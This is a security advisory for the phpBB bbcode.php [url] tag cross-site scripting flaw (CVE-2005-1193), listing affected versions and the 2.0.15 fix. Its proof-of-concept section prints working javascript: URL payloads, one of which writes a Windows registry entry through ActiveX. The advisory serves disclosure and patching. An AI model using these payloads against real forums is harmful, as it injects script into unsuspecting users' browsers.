PHPBB URL Tag BBCode.PHP Vulnerability
BID:13545
Info
PHPBB URL Tag BBCode.PHP Vulnerability
| Bugtraq ID: | 13545 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1193 |
| Remote: | Yes |
| Local: | No |
| Published: | May 09 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | Discovery of this issue is credited to Papados. |
| Vulnerable: |
phpBB Group phpBB 2.0.14 phpBB Group phpBB 2.0.13 phpBB Group phpBB 2.0.12 phpBB Group phpBB 2.0.11 phpBB Group phpBB 2.0.10 phpBB Group phpBB 2.0.9 phpBB Group phpBB 2.0.8 a phpBB Group phpBB 2.0.8 phpBB Group phpBB 2.0.7 a phpBB Group phpBB 2.0.7 phpBB Group phpBB 2.0.6 d phpBB Group phpBB 2.0.6 c phpBB Group phpBB 2.0.6 phpBB Group phpBB 2.0.5 phpBB Group phpBB 2.0.4 phpBB Group phpBB 2.0.3 phpBB Group phpBB 2.0.2 phpBB Group phpBB 2.0.1 phpBB Group phpBB 2.0 .0 phpBB Group phpBB 2.0 RC4 phpBB Group phpBB 2.0 RC3 phpBB Group phpBB 2.0 RC2 phpBB Group phpBB 2.0 RC1 phpBB Group phpBB 2.0 Beta 1 |
| Not Vulnerable: |
phpBB Group phpBB 2.0.15 |
Discussion
PHPBB URL Tag BBCode.PHP Vulnerability
The phpbb vendor reports that a critical vulnerability exists in the BBCode handling routines of the 'bbcode.php' script.
The bbcode [url] tag is not properly sanitized of user-supplied input. This could permit the injection of arbitrary HTML or script code into the browser of an unsuspecting user in the context of the affected site.
The phpbb vendor reports that a critical vulnerability exists in the BBCode handling routines of the 'bbcode.php' script.
The bbcode [url] tag is not properly sanitized of user-supplied input. This could permit the injection of arbitrary HTML or script code into the browser of an unsuspecting user in the context of the affected site.
Exploit / POC
PHPBB URL Tag BBCode.PHP Vulnerability
An exploit is not required.
The following proof of concepts are available:
[url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]
[url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22)
;window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url]
[url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27
,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url]
An exploit is not required.
The following proof of concepts are available:
[url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]
[url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22)
;window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url]
[url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27
,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url]
Solution / Fix
PHPBB URL Tag BBCode.PHP Vulnerability
Solution:
The vendor has released version 2.0.15 to address this issue.
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.14
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.9
Solution:
The vendor has released version 2.0.15 to address this issue.
phpBB Group phpBB 2.0 RC1
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0 RC3
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0 RC4
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0 Beta 1
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0 RC2
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0 .0
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.1
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.10
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.11
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.12
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.13
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.14
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.2
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.3
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.4
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.5
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.6
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.6 c
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.6 d
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.7
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.7 a
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.8 a
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.8
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
phpBB Group phpBB 2.0.9
-
phpBB Group phpBB 2.0.15
http://www.phpbb.com/downloads.php
References
PHPBB URL Tag BBCode.PHP Vulnerability
References:
References:
- phpBB 2.0.15 released (phpBB Group)
- CastleCops phpBB bbcode Input Validation Disclosure (Paul Laudanski
)